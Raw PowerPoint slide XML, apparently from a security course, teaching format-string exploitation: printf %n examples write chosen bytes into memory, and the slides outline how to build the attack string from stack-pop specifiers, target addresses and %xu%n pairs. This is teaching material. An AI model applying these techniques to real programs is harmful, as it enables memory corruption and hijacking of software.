              <a:t> (canary, "AAAA");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1.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("%16u%n",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&amp;foo[0]);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2.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("%32u%n",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&amp;foo[1]);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3.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("%64u%n",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&amp;foo[2]);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4.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 ("%128u%n", 7350,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*) &amp;foo[3]); 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392" y="6350000"/>
            <a:ext cx="260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taken directly from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69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391400" y="2040354"/>
            <a:ext cx="228600" cy="1676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01948" y="2693888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canary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391400" y="3886200"/>
            <a:ext cx="228600" cy="1422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1948" y="4412734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</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1089" name="Table 1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40615"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6550326" y="1585741"/>
          <a:ext cx="76487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0x80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9" name="Line 106"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4243388" y="1912938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2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Writing Arbitrary Values</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="139538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172200" y="2286002"/>
            <a:ext cx="2590800" cy="373379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/>
              </a:rPr>
              <a:t>Black</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16" descr="appst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40" y="2895599"/>
            <a:ext cx="2377760" cy="208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0596" y="4339535"/>
            <a:ext cx="2030604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nsolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>format c: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" y="2286002"/>
            <a:ext cx="2590800" cy="373379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Cambria"/>
              </a:rPr>
              <a:t>White</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 20" descr="appst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0" y="2895600"/>
            <a:ext cx="2377760" cy="2084848"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14" descr="bom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4412">
            <a:off x="3308083" y="1491206"/>
            <a:ext cx="3352800" cy="2003154"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="arrow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549">
            <a:off x="3296148" y="3352801"/>
            <a:ext cx="2795437" cy="1797209"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 18" descr="wif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2" y="3943643"/>
            <a:ext cx="1047995" cy="10038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Rounded Rectangular Callout 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1335741"/>
            <a:ext cx="2526298" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -3456"/>
              <a:gd name="adj2" fmla="val 288968"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln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3600" strike="sngStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Bug </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Fixed!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1905001"/>
            <a:ext cx="228600" cy="42268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7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68746" y="3778830"/>
            <a:ext cx="1083854" cy="1301485"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 508000 w 1367174"/>
              <a:gd name="connsiteY0" fmla="*/ 16544 h 1301485"/>
              <a:gd name="connsiteX1" fmla="*/ 343647 w 1367174"/>
              <a:gd name="connsiteY1" fmla="*/ 91250 h 1301485"/>
              <a:gd name="connsiteX2" fmla="*/ 283883 w 1367174"/>
              <a:gd name="connsiteY2" fmla="*/ 106191 h 1301485"/>
              <a:gd name="connsiteX3" fmla="*/ 239059 w 1367174"/>
              <a:gd name="connsiteY3" fmla="*/ 121132 h 1301485"/>
              <a:gd name="connsiteX4" fmla="*/ 179294 w 1367174"/>
              <a:gd name="connsiteY4" fmla="*/ 165956 h 1301485"/>
              <a:gd name="connsiteX5" fmla="*/ 89647 w 1367174"/>
              <a:gd name="connsiteY5" fmla="*/ 225721 h 1301485"/>
              <a:gd name="connsiteX6" fmla="*/ 74706 w 1367174"/>
              <a:gd name="connsiteY6" fmla="*/ 285485 h 1301485"/>
              <a:gd name="connsiteX7" fmla="*/ 44824 w 1367174"/>
              <a:gd name="connsiteY7" fmla="*/ 315368 h 1301485"/>
              <a:gd name="connsiteX8" fmla="*/ 29883 w 1367174"/>
              <a:gd name="connsiteY8" fmla="*/ 405015 h 1301485"/>
              <a:gd name="connsiteX9" fmla="*/ 0 w 1367174"/>
              <a:gd name="connsiteY9" fmla="*/ 494662 h 1301485"/>
              <a:gd name="connsiteX10" fmla="*/ 44824 w 1367174"/>
              <a:gd name="connsiteY10" fmla="*/ 927956 h 1301485"/>
              <a:gd name="connsiteX11" fmla="*/ 59765 w 1367174"/>
              <a:gd name="connsiteY11" fmla="*/ 972780 h 1301485"/>
              <a:gd name="connsiteX12" fmla="*/ 119530 w 1367174"/>
              <a:gd name="connsiteY12" fmla="*/ 1047485 h 1301485"/>
              <a:gd name="connsiteX13" fmla="*/ 179294 w 1367174"/>
              <a:gd name="connsiteY13" fmla="*/ 1107250 h 1301485"/>
              <a:gd name="connsiteX14" fmla="*/ 194235 w 1367174"/>
              <a:gd name="connsiteY14" fmla="*/ 1152074 h 1301485"/>
              <a:gd name="connsiteX15" fmla="*/ 298824 w 1367174"/>
              <a:gd name="connsiteY15" fmla="*/ 1196897 h 1301485"/>
              <a:gd name="connsiteX16" fmla="*/ 343647 w 1367174"/>
              <a:gd name="connsiteY16" fmla="*/ 1226780 h 1301485"/>
              <a:gd name="connsiteX17" fmla="*/ 403412 w 1367174"/>
              <a:gd name="connsiteY17" fmla="*/ 1241721 h 1301485"/>
              <a:gd name="connsiteX18" fmla="*/ 493059 w 1367174"/>
              <a:gd name="connsiteY18" fmla="*/ 1271603 h 1301485"/>
              <a:gd name="connsiteX19" fmla="*/ 582706 w 1367174"/>
              <a:gd name="connsiteY19" fmla="*/ 1301485 h 1301485"/>
              <a:gd name="connsiteX20" fmla="*/ 1090706 w 1367174"/>
              <a:gd name="connsiteY20" fmla="*/ 1271603 h 1301485"/>
              <a:gd name="connsiteX21" fmla="*/ 1180353 w 1367174"/>
              <a:gd name="connsiteY21" fmla="*/ 1241721 h 1301485"/>
              <a:gd name="connsiteX22" fmla="*/ 1210235 w 1367174"/>
              <a:gd name="connsiteY22" fmla="*/ 1211838 h 1301485"/>
              <a:gd name="connsiteX23" fmla="*/ 1255059 w 1367174"/>
              <a:gd name="connsiteY23" fmla="*/ 1196897 h 1301485"/>
              <a:gd name="connsiteX24" fmla="*/ 1299883 w 1367174"/>
              <a:gd name="connsiteY24" fmla="*/ 1137132 h 1301485"/>
              <a:gd name="connsiteX25" fmla="*/ 1344706 w 1367174"/>
              <a:gd name="connsiteY25" fmla="*/ 1032544 h 1301485"/>
              <a:gd name="connsiteX26" fmla="*/ 1344706 w 1367174"/>
              <a:gd name="connsiteY26" fmla="*/ 434897 h 1301485"/>
              <a:gd name="connsiteX27" fmla="*/ 1299883 w 1367174"/>
              <a:gd name="connsiteY27" fmla="*/ 375132 h 1301485"/>
              <a:gd name="connsiteX28" fmla="*/ 1255059 w 1367174"/>
              <a:gd name="connsiteY28" fmla="*/ 285485 h 1301485"/>
              <a:gd name="connsiteX29" fmla="*/ 1165412 w 1367174"/>
              <a:gd name="connsiteY29" fmla="*/ 225721 h 1301485"/>
              <a:gd name="connsiteX30" fmla="*/ 1090706 w 1367174"/>
              <a:gd name="connsiteY30" fmla="*/ 165956 h 1301485"/>
              <a:gd name="connsiteX31" fmla="*/ 1001059 w 1367174"/>
              <a:gd name="connsiteY31" fmla="*/ 106191 h 1301485"/>
              <a:gd name="connsiteX32" fmla="*/ 956235 w 1367174"/>
              <a:gd name="connsiteY32" fmla="*/ 76309 h 1301485"/>
              <a:gd name="connsiteX33" fmla="*/ 851647 w 1367174"/>
              <a:gd name="connsiteY33" fmla="*/ 46427 h 1301485"/>
              <a:gd name="connsiteX34" fmla="*/ 806824 w 1367174"/>
              <a:gd name="connsiteY34" fmla="*/ 31485 h 1301485"/>
              <a:gd name="connsiteX35" fmla="*/ 732118 w 1367174"/>
              <a:gd name="connsiteY35" fmla="*/ 16544 h 1301485"/>
              <a:gd name="connsiteX36" fmla="*/ 687294 w 1367174"/>
              <a:gd name="connsiteY36" fmla="*/ 1603 h 1301485"/>
              <a:gd name="connsiteX37" fmla="*/ 567765 w 1367174"/>
              <a:gd name="connsiteY37" fmla="*/ 1603 h 1301485"/>
              <a:gd name="connsiteX0" fmla="*/ 508000 w 1367174"/>
              <a:gd name="connsiteY0" fmla="*/ 16544 h 1301485"/>
              <a:gd name="connsiteX1" fmla="*/ 343647 w 1367174"/>
              <a:gd name="connsiteY1" fmla="*/ 91250 h 1301485"/>
              <a:gd name="connsiteX2" fmla="*/ 283883 w 1367174"/>
              <a:gd name="connsiteY2" fmla="*/ 106191 h 1301485"/>
              <a:gd name="connsiteX3" fmla="*/ 239059 w 1367174"/>
              <a:gd name="connsiteY3" fmla="*/ 121132 h 1301485"/>
              <a:gd name="connsiteX4" fmla="*/ 179294 w 1367174"/>
              <a:gd name="connsiteY4" fmla="*/ 165956 h 1301485"/>
              <a:gd name="connsiteX5" fmla="*/ 89647 w 1367174"/>
              <a:gd name="connsiteY5" fmla="*/ 225721 h 1301485"/>
              <a:gd name="connsiteX6" fmla="*/ 74706 w 1367174"/>
              <a:gd name="connsiteY6" fmla="*/ 285485 h 1301485"/>
              <a:gd name="connsiteX7" fmla="*/ 44824 w 1367174"/>
              <a:gd name="connsiteY7" fmla="*/ 315368 h 1301485"/>
              <a:gd name="connsiteX8" fmla="*/ 29883 w 1367174"/>
              <a:gd name="connsiteY8" fmla="*/ 405015 h 1301485"/>
              <a:gd name="connsiteX9" fmla="*/ 0 w 1367174"/>
              <a:gd name="connsiteY9" fmla="*/ 494662 h 1301485"/>
              <a:gd name="connsiteX10" fmla="*/ 44824 w 1367174"/>
              <a:gd name="connsiteY10" fmla="*/ 927956 h 1301485"/>
              <a:gd name="connsiteX11" fmla="*/ 59765 w 1367174"/>
              <a:gd name="connsiteY11" fmla="*/ 972780 h 1301485"/>
              <a:gd name="connsiteX12" fmla="*/ 119530 w 1367174"/>
              <a:gd name="connsiteY12" fmla="*/ 1047485 h 1301485"/>
              <a:gd name="connsiteX13" fmla="*/ 179294 w 1367174"/>
              <a:gd name="connsiteY13" fmla="*/ 1107250 h 1301485"/>
              <a:gd name="connsiteX14" fmla="*/ 194235 w 1367174"/>
              <a:gd name="connsiteY14" fmla="*/ 1152074 h 1301485"/>
              <a:gd name="connsiteX15" fmla="*/ 298824 w 1367174"/>
              <a:gd name="connsiteY15" fmla="*/ 1196897 h 1301485"/>
              <a:gd name="connsiteX16" fmla="*/ 343647 w 1367174"/>
              <a:gd name="connsiteY16" fmla="*/ 1226780 h 1301485"/>
              <a:gd name="connsiteX17" fmla="*/ 403412 w 1367174"/>
              <a:gd name="connsiteY17" fmla="*/ 1241721 h 1301485"/>
              <a:gd name="connsiteX18" fmla="*/ 493059 w 1367174"/>
              <a:gd name="connsiteY18" fmla="*/ 1271603 h 1301485"/>
              <a:gd name="connsiteX19" fmla="*/ 582706 w 1367174"/>
              <a:gd name="connsiteY19" fmla="*/ 1301485 h 1301485"/>
              <a:gd name="connsiteX20" fmla="*/ 1090706 w 1367174"/>
              <a:gd name="connsiteY20" fmla="*/ 1271603 h 1301485"/>
              <a:gd name="connsiteX21" fmla="*/ 1180353 w 1367174"/>
              <a:gd name="connsiteY21" fmla="*/ 1241721 h 1301485"/>
              <a:gd name="connsiteX22" fmla="*/ 1210235 w 1367174"/>
              <a:gd name="connsiteY22" fmla="*/ 1211838 h 1301485"/>
              <a:gd name="connsiteX23" fmla="*/ 1255059 w 1367174"/>
              <a:gd name="connsiteY23" fmla="*/ 1196897 h 1301485"/>
              <a:gd name="connsiteX24" fmla="*/ 1299883 w 1367174"/>
              <a:gd name="connsiteY24" fmla="*/ 1137132 h 1301485"/>
              <a:gd name="connsiteX25" fmla="*/ 1344706 w 1367174"/>
              <a:gd name="connsiteY25" fmla="*/ 1032544 h 1301485"/>
              <a:gd name="connsiteX26" fmla="*/ 1344706 w 1367174"/>
              <a:gd name="connsiteY26" fmla="*/ 434897 h 1301485"/>
              <a:gd name="connsiteX27" fmla="*/ 1299883 w 1367174"/>
              <a:gd name="connsiteY27" fmla="*/ 375132 h 1301485"/>
              <a:gd name="connsiteX28" fmla="*/ 1255059 w 1367174"/>
              <a:gd name="connsiteY28" fmla="*/ 285485 h 1301485"/>
              <a:gd name="connsiteX29" fmla="*/ 1165412 w 1367174"/>
              <a:gd name="connsiteY29" fmla="*/ 225721 h 1301485"/>
              <a:gd name="connsiteX30" fmla="*/ 1090706 w 1367174"/>
              <a:gd name="connsiteY30" fmla="*/ 165956 h 1301485"/>
              <a:gd name="connsiteX31" fmla="*/ 1001059 w 1367174"/>
              <a:gd name="connsiteY31" fmla="*/ 106191 h 1301485"/>
              <a:gd name="connsiteX32" fmla="*/ 851647 w 1367174"/>
              <a:gd name="connsiteY32" fmla="*/ 46427 h 1301485"/>
              <a:gd name="connsiteX33" fmla="*/ 806824 w 1367174"/>
              <a:gd name="connsiteY33" fmla="*/ 31485 h 1301485"/>
              <a:gd name="connsiteX34" fmla="*/ 732118 w 1367174"/>
              <a:gd name="connsiteY34" fmla="*/ 16544 h 1301485"/>
              <a:gd name="connsiteX35" fmla="*/ 687294 w 1367174"/>
              <a:gd name="connsiteY35" fmla="*/ 1603 h 1301485"/>
              <a:gd name="connsiteX36" fmla="*/ 567765 w 1367174"/>
              <a:gd name="connsiteY36" fmla="*/ 1603 h 13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67174" h="1301485">
                <a:moveTo>
                  <a:pt x="508000" y="16544"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="447040" y="47024"/>
                  <a:pt x="407086" y="70104"/>
                  <a:pt x="343647" y="91250"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="324166" y="97744"/>
                  <a:pt x="303627" y="100550"/>
                  <a:pt x="283883" y="106191"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="268739" y="110518"/>
                  <a:pt x="254000" y="116152"/>
                  <a:pt x="239059" y="121132"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="219137" y="136073"/>
                  <a:pt x="199695" y="151676"/>
                  <a:pt x="179294" y="165956"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="149872" y="186551"/>
                  <a:pt x="89647" y="225721"/>
                  <a:pt x="89647" y="225721"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="84667" y="245642"/>
                  <a:pt x="83889" y="267118"/>
                  <a:pt x="74706" y="285485"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68406" y="298085"/>
                  <a:pt x="49770" y="302178"/>
                  <a:pt x="44824" y="315368"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="34187" y="343734"/>
                  <a:pt x="37231" y="375625"/>
                  <a:pt x="29883" y="405015"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="22243" y="435573"/>
                  <a:pt x="9961" y="464780"/>
                  <a:pt x="0" y="494662"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16234" y="697579"/>
                  <a:pt x="2102" y="778427"/>
                  <a:pt x="44824" y="927956"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="49151" y="943100"/>
                  <a:pt x="52722" y="958693"/>
                  <a:pt x="59765" y="972780"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="78613" y="1010477"/>
                  <a:pt x="91735" y="1019691"/>
                  <a:pt x="119530" y="1047485"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="159373" y="1167017"/>
                  <a:pt x="99608" y="1027563"/>
                  <a:pt x="179294" y="1107250"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="190430" y="1118387"/>
                  <a:pt x="183098" y="1140937"/>
                  <a:pt x="194235" y="1152074"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="212698" y="1170537"/>
                  <a:pt x="272036" y="1187968"/>
                  <a:pt x="298824" y="1196897"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="313765" y="1206858"/>
                  <a:pt x="327142" y="1219706"/>
                  <a:pt x="343647" y="1226780"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="362521" y="1234869"/>
                  <a:pt x="383743" y="1235820"/>
                  <a:pt x="403412" y="1241721"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="433582" y="1250772"/>
                  <a:pt x="463177" y="1261642"/>
                  <a:pt x="493059" y="1271603"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="582706" y="1301485"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="752039" y="1291524"/>
                  <a:pt x="921922" y="1288481"/>
                  <a:pt x="1090706" y="1271603"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1122048" y="1268469"/>
                  <a:pt x="1180353" y="1241721"/>
                  <a:pt x="1180353" y="1241721"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1190314" y="1231760"/>
                  <a:pt x="1198156" y="1219086"/>
                  <a:pt x="1210235" y="1211838"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1223740" y="1203735"/>
                  <a:pt x="1242960" y="1206980"/>
                  <a:pt x="1255059" y="1196897"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1274189" y="1180955"/>
                  <a:pt x="1286685" y="1158249"/>
                  <a:pt x="1299883" y="1137132"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1326259" y="1094931"/>
                  <a:pt x="1330182" y="1076117"/>
                  <a:pt x="1344706" y="1032544"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1368060" y="799004"/>
                  <a:pt x="1380616" y="740137"/>
                  <a:pt x="1344706" y="434897"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1341796" y="410166"/>
                  <a:pt x="1314824" y="395054"/>
                  <a:pt x="1299883" y="375132"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1289225" y="343161"/>
                  <a:pt x="1282317" y="309336"/>
                  <a:pt x="1255059" y="285485"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1228031" y="261835"/>
                  <a:pt x="1165412" y="225721"/>
                  <a:pt x="1165412" y="225721"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1110199" y="142899"/>
                  <a:pt x="1167121" y="208409"/>
                  <a:pt x="1090706" y="165956"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1059311" y="148515"/>
                  <a:pt x="1040902" y="126113"/>
                  <a:pt x="1001059" y="106191"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="961216" y="86270"/>
                  <a:pt x="884019" y="58878"/>
                  <a:pt x="851647" y="46427"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="819275" y="33976"/>
                  <a:pt x="822103" y="35305"/>
                  <a:pt x="806824" y="31485"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="782187" y="25326"/>
                  <a:pt x="756755" y="22703"/>
                  <a:pt x="732118" y="16544"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="716839" y="12724"/>
                  <a:pt x="702979" y="3029"/>
                  <a:pt x="687294" y="1603"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="647615" y="-2004"/>
                  <a:pt x="607608" y="1603"/>
                  <a:pt x="567765" y="1603"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln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333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one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err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> ("%16u%n%16u%n%32u%n%64u%n", </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>        1, (int *) &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>[0], </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>        1, (int *) &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>[1], </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>        1, (int *) &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>[2], </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>        1, (int *) &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>[3]); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="nl-NL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2800" dirty="0">
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Each %n writes 4 bytes, but that doesn’t matter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0">
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>nly last byte written is used in the address since we incrementally write each byte of the destination</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0">
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0">
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>See assigned reading for writing an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>arbitrary 4-byte value to an arbitrary 4-byte destination</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0">
                <a:latin typeface="Calibri"/>
              </a:rPr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an arbitrary 4-byte address to an arbitrary 4-byte destination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2786"/>
            <a:ext cx="8487229" cy="409121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stackpop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> – format </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>specifiers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> to increase the stack pointer to the desired position</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Once done, points to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;address/value *4&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>4 addresses + dummy values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The addresses are consecutive memory cells</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>values can be anything other than NULL </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Value is the value %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1"/>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> (below) writes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" err="1"/>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>u%n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> to write values to memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1"/>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> increases least significant byte of internal %n counter </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>%n says to write, where destination is above addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1"/>
              <a:t>x</a:t>
            </a:r>
